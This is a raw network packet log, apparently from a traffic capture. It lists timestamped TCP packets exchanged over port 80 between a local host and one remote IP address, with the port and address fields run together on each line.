                                                                                                                                                                  Dec 18, 2024 11:09:27.194927931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.194953918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.194998980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.195794106 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.195911884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.195935011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.196130991 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.196809053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.196877003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.196962118 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.197124958 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.197856903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.197902918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.197957039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.198204041 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.198779106 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.198896885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.198924065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.199002981 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.199861050 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.199968100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.200007915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.200007915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.200809956 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.200896025 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.200917959 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.200965881 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.201709032 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.201783895 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.201821089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.201884985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.202673912 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.202727079 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.202759027 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.202759027 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.203684092 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.203784943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.203823090 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.203823090 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.204644918 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.204788923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.204833031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.204833031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.205615997 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.205723047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.205769062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.205769062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.206614971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.206741095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.206784010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.206784010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.207587004 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.207705021 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.207746983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.207746983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.208600998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.208760977 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.208803892 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.208803892 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.209566116 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.209615946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.209707975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.210385084 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.210558891 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.210719109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.210761070 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.210761070 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.211559057 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.211630106 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.211672068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.211672068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.212522030 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.212610006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.212650061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.212650061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.213582039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.213632107 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.213666916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.214548111 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.214591026 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.214591026 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.214745045 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.215462923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.215501070 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.215501070 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.215562105 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.216468096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.216490030 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.216507912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.216507912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.217521906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.217561960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.217561960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.217683077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.217725039 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.218646049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.218810081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.218846083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.218846083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.219511032 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.219584942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.219634056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.219634056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.220411062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.220519066 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.220556021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.220556021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.221419096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.221550941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.221590042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.221590042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.222354889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.222575903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.222614050 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.222614050 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.223328114 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.223480940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.223516941 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.223516941 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.224323988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.224464893 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.224497080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.224497080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.225416899 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.225544930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.225594997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.225594997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.226304054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.226342916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.226382971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.227346897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.227392912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.227392912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.227469921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.228241920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.228280067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.228280067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.228395939 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.229217052 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.229254961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.229254961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.229326963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.229726076 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.230174065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.230274916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.230312109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.230312109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.231174946 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.231268883 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.231304884 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.231304884 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.232130051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.232249022 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.232285023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.232285023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.233135939 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.233262062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.233298063 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.233298063 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.234108925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.234148026 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.234256983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.234293938 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.235109091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.235236883 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.235274076 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.235274076 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.236078024 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.236179113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.236212015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.236212015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.237091064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.237210035 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.237243891 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.237243891 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.238029003 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.238070011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.238132954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.238976002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.239013910 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.239013910 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.378506899 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.378577948 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.378587961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.378676891 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.378967047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.379055023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.379091978 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.379091978 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.379772902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.379889965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.379928112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.379928112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.380681038 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.380810976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.380848885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.380848885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.381671906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.381783009 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.381819010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.381819010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.382657051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.382747889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.382785082 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.382785082 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.383723974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.383850098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.383888960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.383888960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.384742975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.384852886 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.384890079 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.384890079 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.385631084 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.385760069 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.385780096 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.386626005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.386666059 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.386666059 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.386744022 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.387346983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.387584925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.387717009 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.387753963 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.387753963 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.388603926 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.388691902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.388708115 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.389547110 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.389568090 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.389730930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.389769077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.389769077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.390602112 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.390775919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.390813112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.390813112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.391520023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.391627073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.391664028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.391664028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.392491102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.392601967 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.392638922 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.392638922 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.393469095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.393584013 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.393600941 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.393702984 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.394443989 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.394603014 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.394618988 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.394659042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.395432949 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.395529032 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.395566940 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.395566940 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.396416903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.396523952 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.396562099 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.396562099 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.397393942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.397531033 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.397537947 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.398370028 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.398413897 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.398413897 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.398473978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.399375916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.399477959 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.399579048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.399612904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.399612904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.400378942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.400602102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.400638103 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.400638103 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.401380062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.401432037 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.401465893 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.401465893 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.402308941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.402345896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.402414083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.403345108 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.403356075 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.403495073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.403532028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.403532028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.404253960 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.404452085 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.404489040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.404489040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.405441046 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.405488968 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.405576944 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.406111002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.406251907 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.406399965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.406436920 CET4991280192.168.2.631.41.244.11
